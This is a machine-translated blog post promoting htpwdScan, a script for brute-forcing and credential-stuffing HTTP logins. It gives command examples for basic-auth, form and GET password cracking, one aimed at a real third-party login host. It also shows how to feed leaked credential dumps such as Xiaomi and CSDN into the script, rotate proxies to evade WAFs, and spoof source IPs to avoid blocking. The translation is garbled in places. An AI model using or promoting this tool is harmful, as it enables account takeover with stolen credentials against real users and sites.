htpwdscan-a simple HTTP brute-force hack, crash-Library attack script

Sister Lee shared with us the sub-domain name enumeration tool Subdomainbrute "subdomainsbrute-python script to improve the brute-force enumeration of subdomains during penetration testing", which brings us Htpwdscan

Htpwdscan is a simple HTTP brute-force hack, crash-attack script:

1. Support batch check and import HTTP proxy, the low-frequency pool can successfully attack most websites, bypassing most of the defense strategy and WAF
2. Support Direct import of leaked social work libraries on the internet, launching a collision attack
3. Support Import of Large dictionary
4. Other fine functions: random x-forwarded-for, Random SessionID, support basic Auth, support MD5 hash, etc.

Here are a few simple examples

HTTP Basic Authentication

htpwdscan.py-u=http://auth.58.com/-basic user.txt password.txt Import user name password dictionary

Form cracking

Htpwdscan.py-f post2.txt-d passwd=password.txt-err= "success\": false "import the captured HTTP packet from Post2.txt, passwd is the parameter that needs to be cracked, The password.txt is a dictionary file that holds the password success ": False is the selected failure token, and if there are double quotes in the tag, remember to use the right slash \ Escape

Get parameter hack

htpwdscan.py-d passwd=password.txt-u= "Http://xxx.com/inside.php?m=login&username=test&passwd=test"-get- Err= "Success\": false "tells the script to use the-get parameter here is a GET request

Crash-Vault attack

Htpwdscan.py-f=post.txt-database loginname,passwd=xiaomi.txt-regex= "(\s+) \s+ (\s+)"-err= "User name or password error"-FIP Htpwdscan.py-f=post.txt-database passwd,loginname=csdn.net.sql-regex= "\s+ # (\s+) # (\s+)"-err= "Username or password error"-FIP use Xiaomi and C The SDN library launches a crash attack. Post.txt is the HTTP request parameter of the grab packet-regex sets the regular expression to extract the parameters from the file, which need to be grouped, grouped by using parentheses () Xiaomi's data row format is [email protected] xxxxxxx (username) blank character (password) (\s +) \s+ (\s+) specifies that the first non-whitespace character is taken to fill the loginname, while the second non-whitespace string is taken to populate the data row format for passwd csdn is ZDG # 12344321 # [email protected]. Regular expression Writing \s+ # (\s+) # (\s+) The non-blank string after the first # fills the passwd, and the non-blank string after the second # fills the LoginName note that the order of the arguments is important

Verifying HTTP Proxies

htpwdscan.py-f=post.txt-proxylist=proxies.txt-checkproxy-suc= "User name or password error" to crack a website, bulk testing using the agent to connect to the target site, Save the HTTP request to Post.txt, and then use the-SUC parameter to set the connectivity tag a simple and feasible way to check is: htpwdscan.py-u=http://www.baidu.com-get-proxylist=available.txt -checkproxy-suc= "Baidu a Bit"

Full parameter description

Script supports a lot of small features, please read the following full instructions below. It is recommended to use the-debug parameter to see if there is a problem with the HTTP request and to initiate a real hack.

usage:htpwdScan.py [Options] * An HTTP weak pass scanner. by Lijiejie * Optional arguments:   -h,--help              Display Help target:   -u requesturl         set Target URL, example.                          -u= "https://www.test.com/login.php"   -f requestfile          import HTTP requests from a file   -https                  when importing an HTTP request from a file, enable HTTPS (SSL)   -get                    using the Get method, default: POST   -basic  [...]         http Basic brute force hack.                          example. -basic users.dic pass.dic Dictionary:   -d param=dictfile [param=dictfile ...]                            set dictionary file for parameters,                           supports hash functions such as MD5, MD5_16, SHA1.                           example. -D user=users.dic pass=md5 (pass.dic) Detect:   -no302                  Ignore 302 Jump, default 302 sensitive   -err err [err ...]      crack Failure token for response text,                           example. -err "User not exist" "Password wrong"   -suc suc [suc ...]      crack success tag in response text,                          e.g.-suc "Welcome," "Admin"   - Herr herr             response HTTP header crack Failure token   - HSUC hsuc             Response HTTP Header crack Success token   - Rtxt retrytext       The retry token in the response text, the retry request appears,                           example. -rtxt= "IP blocked"   -rntxt retrynotext     the retry token in the response text, the retry request occurs,                            an example. -rntxt= "<body>"   -rheader retryheader   the retry token in the response header, a retry request appears,                            example. -rheader= "Set-cookie:"   -rnheader retrynoheader                           Retry token In response header, retry request if not present                          e.g.-rheader= "http/1.1 OK" Proxy and spoof:   -proxy Server:Port      set a small number of HTTP proxies                           example. -proxy=127.0.0.1:8000,8.8.8.8:8000   -proxylist Proxylistfile                           Bulk import of HTTP proxies from files,                           e.g.-proxylist=proxys.txt   -checkproxy            Check the availability of the proxy server.                           available proxy output to 001.proxy.servers.txt   -fip                    randomly random x-forwarded-for spoofing source IP   -fsid fsid             generates a random session ID. Example. -fsid phpsessid   -sleep seconds         Each HTTP end, waiting for SECONDS seconds,                          prevent IP from being temporarily blocked, enter the blacklist Database attack:   - Database database     into the data in the social work pool.                          e.g.-database user,pass=csdn.txt   -regex REGEX            a string that extracts data from the social library must be grouped.                          e.g.-regex= "(\s+) \s+ (\s+)" General:   -t threads              number of worker threads, default   -o output              output file .   default: 000.cracked.passwords.txt   - debug                 into Debug ModeCheck HTTP requests and HTTP responses   -nov                    only shows successful entries, does not show progress   -v                     show Program ' s version number and exit

Download

Get script: Https://github.com/lijiejie/htpwdScan

Feedback

If you find the problem in use, please give me feedback. My[at]lijiejie.com http://www.lijiejie.com

htpwdscan-a simple HTTP brute-force hack, crash-Library attack script